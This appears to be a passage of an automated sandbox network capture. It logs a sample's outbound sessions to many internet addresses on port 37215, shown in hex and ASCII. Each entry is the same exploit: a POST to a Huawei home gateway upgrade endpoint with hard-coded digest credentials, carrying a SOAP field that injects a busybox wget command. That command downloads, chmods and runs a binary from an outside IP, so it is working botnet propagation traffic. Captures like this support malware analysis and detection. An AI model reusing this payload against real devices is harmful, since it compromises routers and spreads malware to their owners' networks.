                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              786192.168.2.1550050138.69.81.8637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227745056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              787192.168.2.1537144157.206.93.17237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227747917 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              788192.168.2.154644637.16.206.17237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227858067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              789192.168.2.154945831.218.238.9237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227859974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              790192.168.2.155404445.143.253.21737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.229959965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              791192.168.2.1535642190.156.106.15337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.229998112 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              792192.168.2.1548696190.124.126.2437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230040073 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              793192.168.2.1549454102.23.128.18337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230043888 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              794192.168.2.155600645.10.45.22837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230073929 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              795192.168.2.154744041.226.228.21437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.230129957 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
